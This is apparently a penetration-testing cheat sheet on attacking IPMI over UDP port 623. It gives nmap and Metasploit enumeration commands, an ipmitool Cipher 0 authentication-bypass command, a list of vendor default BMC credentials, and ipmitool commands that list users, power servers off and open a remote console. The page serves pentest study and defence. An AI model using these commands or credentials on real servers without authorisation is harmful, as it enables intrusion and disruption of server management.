aex.red

623 IPMI (UDP)

Notes

Notes

Alternative Ports
623 UDP (IPMI RMCP)

Service Description
IPMI (Intelligent Platform Management Interface) is used for remote server management, hardware monitoring, and out-of-band administration. Typically used by BMCs (Baseboard Management Controllers). Traffic is exchanged via UDP/623 for RMCP and IPMI commands.

Warning

Some devices allow authentication bypass using Cipher 0 (no authentication). This can lead to full user enumeration and privilege abuse.

Attacks

Authentication Bypass via Cipher 0
Allows access without valid credentials by using null authentication (Auth Type 0). Supported by many older IPMI implementations.

Default or Weak Credentials
Many vendors ship with hardcoded or weak default passwords. Attackers can gain full access if unchanged.

Tools & Exploits

Enumeration

nmap
Scan for UDP/623 IPMI endpoints.

nmap -n -sU -p 623 <target>

Metasploit
Check for Cipher 0 and gather version info.

use auxiliary/scanner/ipmi/ipmi_cipher_zero
use auxiliary/scanner/ipmi/ipmi_version

ipmitool
Standard client for querying/managing IPMI endpoints.

# Cipher 0 null auth attack
ipmitool -I lanplus -C 0 -H <target> -U <username> -P <password> user list

Known Default Credentials (by Vendor)

Supermicro: ADMIN / ADMIN
Dell iDRAC: root / calvin
HP iLO: Administrator / <8-char default from label>
Cisco UCS: admin / admin
Generic: root / changeme

Exploitation or Post-Enum

Enumerate Users & Capabilities

ipmitool -I lanplus -H <target> -U <user> -P <pass> user list
ipmitool -I lanplus -H <target> -U <user> -P <pass> lan print

Power Controls / Remote Admin

ipmitool -I lanplus -H <target> -U <user> -P <pass> power status
ipmitool -I lanplus -H <target> -U <user> -P <pass> power off
ipmitool -I lanplus -H <target> -U <user> -P <pass> sol activate

Wireshark Analysis Tips

Filters

udp.port == 623

What to look for:

  • RMCP traffic structure
  • Cipher suite negotiation (look for Auth Type: None)
  • Leaked BMC metadata (firmware version, MAC, device type)

BMC Fingerprinting

  • Scan nearby ports (80, 443, 6230, 8443) for web admin interfaces
  • Inspect MAC OUI to identify hardware vendor
  • Banner grabbing / HTTP responses can reveal model/firmware
  • SNMP or web UI leaks may also expose firmware and vendor info

References

Graph View